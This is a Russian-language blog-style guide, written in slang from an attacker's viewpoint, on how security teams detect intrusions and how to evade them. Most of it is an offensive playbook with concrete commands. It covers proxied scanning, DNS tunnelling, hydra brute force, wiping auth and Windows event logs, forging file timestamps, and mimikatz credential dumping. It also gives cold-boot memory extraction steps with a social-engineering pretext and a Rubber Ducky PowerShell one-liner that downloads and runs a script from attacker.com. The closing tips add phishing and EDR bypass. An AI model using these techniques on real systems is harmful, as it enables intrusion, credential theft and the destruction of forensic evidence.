Blue Team, Red Team

Red Team vs Blue Team: жизнь на грани — как накрывают и как не попадаться

Йо, братан, садись поближе к терминалу, ща будем разбирать мясо темы: «Red Team vs Blue Team: жизнь на грани — как накрывают и как не попадаться». Мы с тобой в подвале, старые волки, знаем, как пахнет адреналин, когда SIEM орёт, а IDS мигает красным. Сегодня я расскажу, как Blue Team нас ловит, как мы их обходим, и что делать, когда надо ломать всё и сразу — от маскировки до cold boot атак. Погнали, как в старые добрые CTF’ы!

Как Blue Team нас накрывает: SIEM и IDS

Точка входа: Blue Team сидит на своих SIEM’ах (Splunk, QRadar) и IDS/IPS (Snort, Suricata). Их цель — поймать нас на горячем.

  1. Типичные срабатывания:
    • Сканирование портов: Если лупишь nmap -sS target.com, IDS может заорать на аномальный трафик. Логи идут в SIEM, и Blue Team начинает копать.
    • Брутфорс: Попытки подбора паролей через hydra или medusa генерят кучу неудачных логинов. SIEM триггерит на паттерн «много фейлов с одного IP».
    • C2-трафик: Если залили шелл и тянем команды через msfconsole, IDS может засечь подозрительный трафик на нестандартные порты (4444, например).
    • Аномалии: Blue Team смотрит на поведение в сети. Если ты залогинился в 3 утра из другой гео, жди, что начнут проверять.
  2. Что бросилось в глаза: SIEM часто завязан на корреляцию логов. Если ты оставляешь следы в /var/log/auth.log или Windows Event Log, они сложат два и два.

Вектор защиты Blue Team: Они настраивают правила на частые сигнатуры (например, Metasploit-пейлоады) и машинное обучение для выявления аномалий.

Как не попадаться: методы маскировки

Точка входа: Наша задача — быть тише воды. Обходим SIEM и IDS через маскировку и хитрости.

  1. Маскировка трафика:
    • Используем Tor или цепочку прокси: torsocks nmap -sS target.com. Это скрывает наш IP.
    • Для C2-трафика юзаем HTTPS или DNS-туннелирование через dnscat2. Команда: dnscat2 client target.com 53. Blue Team хрен заметит, что это не просто DNS-запросы.
    • Меняем User-Agent на легитимный: curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" target.com. IDS меньше триггерит на «обычный» браузер.
  2. Снижение шума:
    • Сканируем медленно с таймингами: nmap -T2 -sS target.com. Это снижает шанс срабатывания IDS.
    • Избегаем дефолтных пейлоадов Metasploit. Обфусцируем через veil-evasion или пишем свой шелл-код.
    • Для брутфорса юзаем маленькие списки паролей и рандомные задержки: hydra -l user -P small_pass.txt -t 1 target.com ssh.
  3. Стерилизация следов:
    • Чистим логи после входа. На Linux: echo "" > /var/log/auth.log. На Windows: wevtutil cl System (нужны админские права).
    • Меняем timestamps файлов, чтоб не палиться: touch -t 202306010000 /path/to/file.
    • Используем mimikatz для работы в памяти, не трогая диск: sekurlsa::logonpasswords.

Что бросилось в глаза: Blue Team часто не замечает медленный, распределённый трафик. Если растянуть атаку на дни и не жадничать, IDS молчит.

Вектор атаки: Маскируемся под легитимный трафик, работаем через доверенные протоколы (HTTPS, DNS), чистим следы сразу после компрометации.

Физический доступ: Cold Boot и всё и сразу

Точка входа: Когда удалёнка не катит, идём на физический доступ. Cold Boot атака — наш козырь, если надо выцепить ключи из памяти.

  1. Cold Boot Attack:
    • Суть: RAM сохраняет данные даже после выключения, если быстро охладить. Понадобится баллончик со сжатым воздухом или жидкий азот.
    • Шаги:
      1. Получаем доступ к тачке (например, через социалку: «Я из IT, надо проверить сервер»).
      2. Вырубаем питание, охлаждаем RAM (держим баллончик вверх дном, брызгаем на модули).
      3. Вытаскиваем RAM, вставляем в свою тачку с предустановленным софтом типа memimage.
      4. Дампим память: memimage -o dump.bin.
      5. Ищем ключи шифрования или пароли через strings dump.bin | grep -i password.
    • Риски: Надо действовать быстро, данные в RAM держатся минуты. Blue Team может засечь физический доступ через камеры или охрану.
  2. Другие физические атаки:
    • USB Rubber Ducky: Подключаем флешку, которая эмулирует клаву. Загружаем пейлоад за 10 секунд: powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1').
    • LAN Turtle: Втыкаем девайс в сеть, получаем удалённый доступ через SSH. Команда: ssh root@lan-turtle-ip.

Что бросилось в глаза: Физический доступ — это 100% компрометация, если Blue Team не закрыла порты или не шифрует диски на уровне железа (BitLocker с TPM).

Вектор атаки: Если попали к железу, Cold Boot даёт ключи от дисков или VPN. Rubber Ducky или LAN Turtle — для быстрого внедрения в сеть. После этого уходим в тень, маскируем трафик.

Red Team vs Blue Team: игра в прятки

Точка входа: Это вечный бой. Blue Team строит защиту, мы ищем дыры. Их сила — в мониторинге и корреляции, наша — в хитрости и терпении.

  1. Их тактика: SIEM ловит на паттернах, IDS — на сигнатурах, EDR (Endpoint Detection and Response) — на поведении малвари.
  2. Наша тактика: Обфускация, низкий профиль, стерилизация. Если попались — меняем IP, юзаем новые C2-серверы, работаем через легитимные сервисы (Google Drive как C2, например).

Что бросилось в глаза: Blue Team часто реагирует с задержкой. Если не поднимать панику, можно сидеть в сети неделями, пока они не заметят.

Вектор атаки: Наша задача — бить точечно, не оставлять следов, уходить до первого алерта. Если Blue Team нас засекла, меняем тактику на лету, уходим на физический доступ или социалку.

Итог: жизнь на грани

Мы с тобой, братан, всегда на острие. Blue Team — это стена, но любая стена рушится, если знать, куда бить. От обхода SIEM через DNS-туннели до Cold Boot атак — у нас всегда есть план. Главное — не торопиться, не палиться и чистить за собой. Ща дам ещё пару идей, куда копать, если запахло жареным.

Советы

  1. Обфускация шеллов: Если C2-трафик палят, попробуй кастомные пейлоады через Cobalt Strike с Malleable C2 профилями. Пусть выглядит как легитимный трафик Amazon S3.
  2. EDR-обход: Чекни актуальные техники обхода EDR на GitHub (например, EDR-Telemetry-Killer). Часто они не видят работу в памяти.
  3. Социалка как запасной план: Если сеть закрыта, лезь к людям. Фишинг через фейковые звонки или письма всё ещё работает.
  4. Физический доступ 2.0: Если Cold Boot не катит, попробуй подмену BIOS или загрузку с live-USB (Kali Linux с persistence).
  5. Анализ логов Blue Team: Если попался, изучи, что именно триггерит их алерты (через утечки или инсайдеров), и подстрой тактику.

План атаки: начинаем с тихого проникновения, маскируемся под легитимный трафик, стерилизуем следы. Если Blue Team близко, уходим на физический доступ или переключаемся на социалку. Терминалы наготове, брат, давай рвём их защиту в клочья!

Red Team vs Blue Team: жизнь на грани — как накрывают и как не попадаться